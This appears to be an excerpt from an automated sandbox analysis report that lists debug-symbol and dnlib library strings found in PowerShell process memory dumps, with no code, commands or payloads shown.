Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.1732143246.000001B9E0134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1730333035.000001B9DFE4B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbes(x source: powershell.exe, 00000008.00000002.1733091752.000001B9E0196000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1730333035.000001B9DFF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1742752814.00007FFB4ACD0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb5 source: powershell.exe, 00000008.00000002.1730333035.000001B9DFF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000008.00000002.1733091752.000001B9E0196000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000008.00000002.1732143246.000001B9E00F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb1 source: powershell.exe, 00000008.00000002.1733091752.000001B9E0196000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1742752814.00007FFB4ACD0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
